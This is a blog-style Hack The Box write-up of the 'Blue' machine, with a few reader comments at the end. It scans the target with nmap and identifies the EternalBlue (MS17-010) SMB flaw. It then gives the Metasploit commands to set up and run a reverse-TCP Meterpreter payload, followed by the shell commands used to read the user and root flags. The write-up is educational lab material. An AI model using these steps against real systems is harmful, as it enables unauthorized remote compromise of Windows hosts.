Hack The Box - Blue
DISCLAIMER: I am not an expert penetration tester.
For all thoughts, opinions, insights, tools, techniques, tactics, hashtags mentioned below, do verify with industry standard resources and references.
Methods below are for educational purposes and should not be used outside of a practice lab environment or without the express written consent and authorization of all parties involved.
This is my journey to develop as a pentester, internalize methodologies, and attempt to give back to the infosec community by teaching what I learn along the way.
Now, down to business.
Name: Blue OS: Windows Difficulty: Easy Release: 28 Jul 2017 IP: 10.10.10.40 Hacker Status: Noob
First box we are going to tackle deals with a well known exploitation and gives us a great example of a reverse shell.
To start, we are going to run an Nmap scan on the virtual machine to discover open ports, services running, and operating system enumeration.
'nmap -A -T4 10.10.10.40'
Right away, we're drawn to open port 445, which identifies the targeted host OS as Windows 7 7601 SP 1.
After a quick Google search, we find that this specific OS is susceptible to an SMB remote code execution exploit called MS17-010 or more widely known as EternalBlue.
EternalBlue exploits a critical vulnerability in Microsoft's implementation of the Server Messaging Block (SMB) protocol. SMB provides shared access to resources between nodes on a network.
Now that we have identified an exploit for our target machine's OS, we can search 'MS17-010' in Metasploit and select the corresponding exploit for our target machine's OS.
We then type the command:
'use [exploit name]'
into the Metasploit command terminal and view the options available for this exploit.
We input Module Options commands as follows:
'set RHOST [target IP]'
'set LHOST [host IP]'
'set LPORT [port #]'
'set payload windows/x64/meterpreter/reverse_tcp'
Then type 'show options' to validate changes:
Type 'run' command to initiate the exploit.
You can see from the 'WIN' output that the exploit was executed successfully and a reverse tcp Meterpreter shell window was created on your host machine.
Type 'sysinfo' followed by 'getuid' to validate the Meterpreter command shell is associated with our target machine.
Use 'shell' command to drop into a Windows command prompt. Change to root directory with 'cd \..\..' command and view contents of root directory with 'dir' command.
This is Hack The Box, so let's grab the first User flag by changing to the Users\haris\Desktop directory, validating contents in directory using 'dir' and then printing out file contents using 'type user.txt'.
As we can see from the directory listing, the output is a 32-bit MD5 hash, which is the typical hash algorithm used for Hack The Box machine flags.
Now, let's grab the Root flag by changing to the Users\Administrator\Desktop directory, validating contents in directory using 'dir' and then printing out file contents using 'type root.txt'.
Voila! We can see from the output of the command that the 'root.txt' file contains the MD5 hash for the Administrator (Root).
Due note that Blue is a retired box and all associated flags carry no points, just practice :)
That's it!
Not the most challenging box, but a good first HTB challenge to get under our belts and understand what a successful root looks like.
As we progress, our goal is to become more manual in our enumeration and testing, and rely less on robust tools for exploitation.
Prost!
interested in actively following along? Check out the Hack The Box invite code challenge :)
Software Engineer
5 年My first one was OpenAdmin then the Traversxec! Theiy are linux boxes fairly simple!!!
Nice! Well written as well :)
Love it Micah!